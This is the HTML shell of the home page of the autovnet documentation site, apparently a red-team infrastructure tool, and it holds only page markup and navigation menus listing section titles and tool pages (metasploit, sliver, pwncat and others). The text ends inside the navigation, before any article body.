
<!doctype html>
<html lang="en" class="no-js">
  <head>
    
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      
      
      
        <link rel="canonical" href="https://autovtools.gitlab.io/autovrtfm/">
      
      
      
        <link rel="next" href="rtfm/">
      
      
      <link rel="icon" href="assets/images/favicon.png">
      <meta name="generator" content="mkdocs-1.5.3, mkdocs-material-9.4.6">
    
    
      
        <title>autovnet - autovnet</title>
      
    
    
      <link rel="stylesheet" href="assets/stylesheets/main.35e1ed30.min.css">
      
        
        <link rel="stylesheet" href="assets/stylesheets/palette.356b1318.min.css">
      
      


    
    
      
    
    
      
        
        
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,300i,400,400i,700,700i%7CRoboto+Mono:400,400i,700,700i&display=fallback">
        <style>:root{--md-text-font:"Roboto";--md-code-font:"Roboto Mono"}</style>
      
    
    
      <link rel="stylesheet" href="stylesheets/extra.css">
    
    <script>__md_scope=new URL(".",location),__md_hash=e=>[...e].reduce((e,_)=>(e<<5)-e+_.charCodeAt(0),0),__md_get=(e,_=localStorage,t=__md_scope)=>JSON.parse(_.getItem(t.pathname+"."+e)),__md_set=(e,_,t=localStorage,a=__md_scope)=>{try{t.setItem(a.pathname+"."+e,JSON.stringify(_))}catch(e){}}</script>
    
      

    
    
    
  </head>
  
  
    
    
      
    
    
    
    
    <body dir="ltr" data-md-color-scheme="slate" data-md-color-primary="indigo" data-md-color-accent="indigo">
  
    
    
      <script>var palette=__md_get("__palette");if(palette&&"object"==typeof palette.color)for(var key of Object.keys(palette.color))document.body.setAttribute("data-md-color-"+key,palette.color[key])</script>
    
    <input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
    <input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
    <label class="md-overlay" for="__drawer"></label>
    <div data-md-component="skip">
      
        
        <a href="#autovnet" class="md-skip">
          Skip to content
        </a>
      
    </div>
    <div data-md-component="announce">
      
    </div>
    
    
      

  

<header class="md-header md-header--shadow md-header--lifted" data-md-component="header">
  <nav class="md-header__inner md-grid" aria-label="Header">
    <a href="https://gitlab.com/autovtools/autovrtfm/autovnet" title="autovnet" class="md-header__button md-logo" aria-label="autovnet" data-md-component="logo">
      
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54Z"/></svg>

    </a>
    <label class="md-header__button md-icon" for="__drawer">
      
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3V6m0 5h18v2H3v-2m0 5h18v2H3v-2Z"/></svg>
    </label>
    <div class="md-header__title" data-md-component="header-title">
      <div class="md-header__ellipsis">
        <div class="md-header__topic">
          <span class="md-ellipsis">
            autovnet
          </span>
        </div>
        <div class="md-header__topic" data-md-component="header-topic">
          <span class="md-ellipsis">
            
              autovnet
            
          </span>
        </div>
      </div>
    </div>
    
      
        <form class="md-header__option" data-md-component="palette">
  
    
    
    
    <input class="md-option" data-md-color-media="" data-md-color-scheme="slate" data-md-color-primary="indigo" data-md-color-accent="indigo"  aria-label="Switch to light mode"  type="radio" name="__palette" id="__palette_1">
    
      <label class="md-header__button md-icon" title="Switch to light mode" for="__palette_2" hidden>
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M17 7H7a5 5 0 0 0-5 5 5 5 0 0 0 5 5h10a5 5 0 0 0 5-5 5 5 0 0 0-5-5m0 8a3 3 0 0 1-3-3 3 3 0 0 1 3-3 3 3 0 0 1 3 3 3 3 0 0 1-3 3Z"/></svg>
      </label>
    
  
    
    
    
    <input class="md-option" data-md-color-media="" data-md-color-scheme="default" data-md-color-primary="indigo" data-md-color-accent="indigo"  aria-label="Switch to dark mode"  type="radio" name="__palette" id="__palette_2">
    
      <label class="md-header__button md-icon" title="Switch to dark mode" for="__palette_1" hidden>
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M17 6H7c-3.31 0-6 2.69-6 6s2.69 6 6 6h10c3.31 0 6-2.69 6-6s-2.69-6-6-6zm0 10H7c-2.21 0-4-1.79-4-4s1.79-4 4-4h10c2.21 0 4 1.79 4 4s-1.79 4-4 4zM7 9c-1.66 0-3 1.34-3 3s1.34 3 3 3 3-1.34 3-3-1.34-3-3-3z"/></svg>
      </label>
    
  
</form>
      
    
    
    
      <label class="md-header__button md-icon" for="__search">
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.516 6.516 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5Z"/></svg>
      </label>
      <div class="md-search" data-md-component="search" role="dialog">
  <label class="md-search__overlay" for="__search"></label>
  <div class="md-search__inner" role="search">
    <form class="md-search__form" name="search">
      <input type="text" class="md-search__input" name="query" aria-label="Search" placeholder="Search" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="search-query" required>
      <label class="md-search__icon md-icon" for="__search">
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.516 6.516 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5Z"/></svg>
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11h12Z"/></svg>
      </label>
      <nav class="md-search__options" aria-label="Search">
        
        <button type="reset" class="md-search__icon md-icon" title="Clear" aria-label="Clear" tabindex="-1">
          
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12 19 6.41Z"/></svg>
        </button>
      </nav>
      
        <div class="md-search__suggest" data-md-component="search-suggest"></div>
      
    </form>
    <div class="md-search__output">
      <div class="md-search__scrollwrap" data-md-scrollfix>
        <div class="md-search-result" data-md-component="search-result">
          <div class="md-search-result__meta">
            Initializing search
          </div>
          <ol class="md-search-result__list" role="presentation"></ol>
        </div>
      </div>
    </div>
  </div>
</div>
    
    
      <div class="md-header__source">
        <a href="https://gitlab.com/autovtools/autovrtfm/autovnet" title="Go to repository" class="md-source" data-md-component="source">
  <div class="md-source__icon md-icon">
    
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512"><!--! Font Awesome Free 6.4.2 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2023 Fonticons, Inc.--><path d="M439.55 236.05 244 40.45a28.87 28.87 0 0 0-40.81 0l-40.66 40.63 51.52 51.52c27.06-9.14 52.68 16.77 43.39 43.68l49.66 49.66c34.23-11.8 61.18 31 35.47 56.69-26.49 26.49-70.21-2.87-56-37.34L240.22 199v121.85c25.3 12.54 22.26 41.85 9.08 55a34.34 34.34 0 0 1-48.55 0c-17.57-17.6-11.07-46.91 11.25-56v-123c-20.8-8.51-24.6-30.74-18.64-45L142.57 101 8.45 235.14a28.86 28.86 0 0 0 0 40.81l195.61 195.6a28.86 28.86 0 0 0 40.8 0l194.69-194.69a28.86 28.86 0 0 0 0-40.81z"/></svg>
  </div>
  <div class="md-source__repository">
    GitLab
  </div>
</a>
      </div>
    
  </nav>
  
    
      
<nav class="md-tabs" aria-label="Tabs" data-md-component="tabs">
  <div class="md-grid">
    <ul class="md-tabs__list">
      
        
  
  
    
  
  
    
    
      <li class="md-tabs__item md-tabs__item--active">
        <a href="." class="md-tabs__link">
          
  
  Home

        </a>
      </li>
    
  

      
        
  
  
  
    
    
      <li class="md-tabs__item">
        <a href="rtfm/" class="md-tabs__link">
          
  
  RTFM

        </a>
      </li>
    
  

      
        
  
  
  
    
    
      <li class="md-tabs__item">
        <a href="demo/" class="md-tabs__link">
          
  
  Demo

        </a>
      </li>
    
  

      
        
  
  
  
    
    
      <li class="md-tabs__item">
        <a href="setup/" class="md-tabs__link">
          
  
  Setup

        </a>
      </li>
    
  

      
        
  
  
  
    
    
      <li class="md-tabs__item">
        <a href="usage/" class="md-tabs__link">
          
  
  Usage

        </a>
      </li>
    
  

      
        
  
  
  
    
    
      <li class="md-tabs__item">
        <a href="usage/help/" class="md-tabs__link">
          
  
  Reference

        </a>
      </li>
    
  

      
        
  
  
  
    
    
      <li class="md-tabs__item">
        <a href="resources/faq/" class="md-tabs__link">
          
  
  Resources

        </a>
      </li>
    
  

      
    </ul>
  </div>
</nav>
    
  
</header>
    
    <div class="md-container" data-md-component="container">
      
      
        
      
      <main class="md-main" data-md-component="main">
        <div class="md-main__inner md-grid">
          
            
              
              <div class="md-sidebar md-sidebar--primary" data-md-component="sidebar" data-md-type="navigation" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    


  


  

<nav class="md-nav md-nav--primary md-nav--lifted md-nav--integrated" aria-label="Navigation" data-md-level="0">
  <label class="md-nav__title" for="__drawer">
    <a href="https://gitlab.com/autovtools/autovrtfm/autovnet" title="autovnet" class="md-nav__button md-logo" aria-label="autovnet" data-md-component="logo">
      
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54Z"/></svg>

    </a>
    autovnet
  </label>
  
    <div class="md-nav__source">
      <a href="https://gitlab.com/autovtools/autovrtfm/autovnet" title="Go to repository" class="md-source" data-md-component="source">
  <div class="md-source__icon md-icon">
    
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512"><!--! Font Awesome Free 6.4.2 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2023 Fonticons, Inc.--><path d="M439.55 236.05 244 40.45a28.87 28.87 0 0 0-40.81 0l-40.66 40.63 51.52 51.52c27.06-9.14 52.68 16.77 43.39 43.68l49.66 49.66c34.23-11.8 61.18 31 35.47 56.69-26.49 26.49-70.21-2.87-56-37.34L240.22 199v121.85c25.3 12.54 22.26 41.85 9.08 55a34.34 34.34 0 0 1-48.55 0c-17.57-17.6-11.07-46.91 11.25-56v-123c-20.8-8.51-24.6-30.74-18.64-45L142.57 101 8.45 235.14a28.86 28.86 0 0 0 0 40.81l195.61 195.6a28.86 28.86 0 0 0 40.8 0l194.69-194.69a28.86 28.86 0 0 0 0-40.81z"/></svg>
  </div>
  <div class="md-source__repository">
    GitLab
  </div>
</a>
    </div>
  
  <ul class="md-nav__list" data-md-scrollfix>
    
      
      
  
  
    
  
  
    
    
    
    
    
      
      
    
    <li class="md-nav__item md-nav__item--active md-nav__item--section md-nav__item--nested">
      
        
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_1" checked>
        
          
          <label class="md-nav__link" for="__nav_1" id="__nav_1_label" tabindex="">
            
  
  <span class="md-ellipsis">
    Home
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_1_label" aria-expanded="true">
          <label class="md-nav__title" for="__nav_1">
            <span class="md-nav__icon md-icon"></span>
            Home
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
    
  
  
    <li class="md-nav__item md-nav__item--active">
      
      <input class="md-nav__toggle md-toggle" type="checkbox" id="__toc">
      
      
        
      
      
        <label class="md-nav__link md-nav__link--active" for="__toc">
          
  
  <span class="md-ellipsis">
    autovnet
  </span>
  

          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <a href="." class="md-nav__link md-nav__link--active">
        
  
  <span class="md-ellipsis">
    autovnet
  </span>
  

      </a>
      
        

<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
  
  
  
    
  
  
    <label class="md-nav__title" for="__toc">
      <span class="md-nav__icon md-icon"></span>
      Table of contents
    </label>
    <ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#description" class="md-nav__link">
    Description
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#why-autovnet" class="md-nav__link">
    Why autovnet?
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#80-443-for-everyone" class="md-nav__link">
    :80 / :443 For Everyone!
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#botnets-for-everyone" class="md-nav__link">
    Botnets for Everyone!
  </a>
  
    <nav class="md-nav" aria-label="Botnets for Everyone!">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#attacker" class="md-nav__link">
    Attacker
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#target" class="md-nav__link">
    Target
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#finally-a-solution-that-sparks-joy" class="md-nav__link">
    Finally, a Solution that Sparks Joy
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#but-wait-theres-more-multiplayer-collaboration" class="md-nav__link">
    But Wait, There's More: Multiplayer Collaboration!
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#how-is-something-this-awesome-even-possible" class="md-nav__link">
    How is Something This Awesome Even Possible?
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#get-started" class="md-nav__link">
    Get Started
  </a>
  
</li>
      
    </ul>
  
</nav>
      
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
      
      
  
  
  
    
    
    
    
    
      
      
    
    <li class="md-nav__item md-nav__item--section md-nav__item--nested">
      
        
        
        
          
        
        <input class="md-nav__toggle md-toggle md-toggle--indeterminate" type="checkbox" id="__nav_2" >
        
          
          <label class="md-nav__link" for="__nav_2" id="__nav_2_label" tabindex="">
            
  
  <span class="md-ellipsis">
    RTFM
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_2_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_2">
            <span class="md-nav__icon md-icon"></span>
            RTFM
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="rtfm/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    RTFM
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="rtfm/paradigm/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Paradigm
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="rtfm/autovnet/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    autovnet
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="rtfm/goals/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Goals
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
      
      
  
  
  
    
    
    
    
    
      
      
    
    <li class="md-nav__item md-nav__item--section md-nav__item--nested">
      
        
        
        
          
        
        <input class="md-nav__toggle md-toggle md-toggle--indeterminate" type="checkbox" id="__nav_3" >
        
          
          <label class="md-nav__link" for="__nav_3" id="__nav_3_label" tabindex="">
            
  
  <span class="md-ellipsis">
    Demo
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_3_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_3">
            <span class="md-nav__icon md-icon"></span>
            Demo
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="demo/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Demo
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="demo/proxy/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Proxy
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="demo/callback/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Callback
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
      
      
  
  
  
    
    
    
    
    
      
      
    
    <li class="md-nav__item md-nav__item--section md-nav__item--nested">
      
        
        
        
          
        
        <input class="md-nav__toggle md-toggle md-toggle--indeterminate" type="checkbox" id="__nav_4" >
        
          
          <label class="md-nav__link" for="__nav_4" id="__nav_4_label" tabindex="">
            
  
  <span class="md-ellipsis">
    Setup
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_4_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_4">
            <span class="md-nav__icon md-icon"></span>
            Setup
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="setup/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Quick Start
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="setup/network/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Network Design
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="setup/install/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Install
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="setup/configure/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Configure
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="setup/local/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Local Install
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
      
      
  
  
  
    
    
    
    
    
      
      
    
    <li class="md-nav__item md-nav__item--section md-nav__item--nested">
      
        
        
        
          
        
        <input class="md-nav__toggle md-toggle md-toggle--indeterminate" type="checkbox" id="__nav_5" >
        
          
          <label class="md-nav__link" for="__nav_5" id="__nav_5_label" tabindex="">
            
  
  <span class="md-ellipsis">
    Usage
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_5_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_5">
            <span class="md-nav__icon md-icon"></span>
            Usage
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="usage/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Usage
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    
    
    
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        
          
        
        <input class="md-nav__toggle md-toggle md-toggle--indeterminate" type="checkbox" id="__nav_5_2" >
        
          
          <label class="md-nav__link" for="__nav_5_2" id="__nav_5_2_label" tabindex="0">
            
  
  <span class="md-ellipsis">
    RDN
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="2" aria-labelledby="__nav_5_2_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_5_2">
            <span class="md-nav__icon md-icon"></span>
            RDN
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="usage/rdn/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    RDN
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="usage/rdn/proxy/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Proxy
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="usage/rdn/listen/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Listen
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="usage/rdn/tun/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Tun
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="usage/rdn/dns/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    DNS
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

              
            
              
                
  
  
  
    
    
    
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        
          
        
        <input class="md-nav__toggle md-toggle md-toggle--indeterminate" type="checkbox" id="__nav_5_3" >
        
          
          <label class="md-nav__link" for="__nav_5_3" id="__nav_5_3_label" tabindex="0">
            
  
  <span class="md-ellipsis">
    RTFM
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="2" aria-labelledby="__nav_5_3_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_5_3">
            <span class="md-nav__icon md-icon"></span>
            RTFM
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="usage/rtfm/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    RTFM
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="usage/rtfm/apt/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    APT
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="usage/rtfm/pasta/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Pasta
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

              
            
              
                
  
  
  
    
    
    
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        
          
        
        <input class="md-nav__toggle md-toggle md-toggle--indeterminate" type="checkbox" id="__nav_5_4" >
        
          
          <label class="md-nav__link" for="__nav_5_4" id="__nav_5_4_label" tabindex="0">
            
  
  <span class="md-ellipsis">
    Pwn
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="2" aria-labelledby="__nav_5_4_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_5_4">
            <span class="md-nav__icon md-icon"></span>
            Pwn
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="usage/pwn/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    pwn
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="usage/pwn/share/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    File Hosting
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="usage/pwn/pwncat/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    pwncat
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="usage/pwn/winrm/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    evil-winrm
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="usage/pwn/metasploit/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    metasploit
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="usage/pwn/merlin/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    merlin
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="usage/pwn/sliver/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    sliver
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="usage/pwn/ligolo_ng/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    ligolo-ng
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

              
            
              
                
  
  
  
    
    
    
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        
          
        
        <input class="md-nav__toggle md-toggle md-toggle--indeterminate" type="checkbox" id="__nav_5_5" >
        
          
          <label class="md-nav__link" for="__nav_5_5" id="__nav_5_5_label" tabindex="0">
            
  
  <span class="md-ellipsis">
    Collaboration
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="2" aria-labelledby="__nav_5_5_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_5_5">
            <span class="md-nav__icon md-icon"></span>
            Collaboration
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="usage/collaboration/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Collaboration
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="usage/collaboration/svc/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Services
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="usage/collaboration/fs/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Shared Directories
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="usage/collaboration/vnc/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Screen Sharing
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="usage/collaboration/hedgedoc/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Shared Notes
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="usage/collaboration/msfdb/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    msfdb
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="usage/collaboration/gitea/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    gitea
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="usage/collaboration/focalboard/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    focalboard
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="usage/collaboration/drawio/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    drawio
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="usage/collaboration/cyberchef/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    cyberchef
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="usage/collaboration/matrix/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    matrix
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="usage/collaboration/nextcloud/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    nextcloud
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="usage/collaboration/owncast/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    owncast
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

              
            
              
                
  
  
  
    
    
    
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        
          
        
        <input class="md-nav__toggle md-toggle md-toggle--indeterminate" type="checkbox" id="__nav_5_6" >
        
          
          <label class="md-nav__link" for="__nav_5_6" id="__nav_5_6_label" tabindex="0">
            
  
  <span class="md-ellipsis">
    Util
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="2" aria-labelledby="__nav_5_6_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_5_6">
            <span class="md-nav__icon md-icon"></span>
            Util
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="usage/util/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    util
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="usage/util/tmp/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    tmp
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
      
      
  
  
  
    
    
    
    
    
      
      
    
    <li class="md-nav__item md-nav__item--section md-nav__item--nested">
      
        
        
        
          
        
        <input class="md-nav__toggle md-toggle md-toggle--indeterminate" type="checkbox" id="__nav_6" >
        
          
          <label class="md-nav__link" for="__nav_6" id="__nav_6_label" tabindex="">
            
  
  <span class="md-ellipsis">
    Reference
  </span>
  

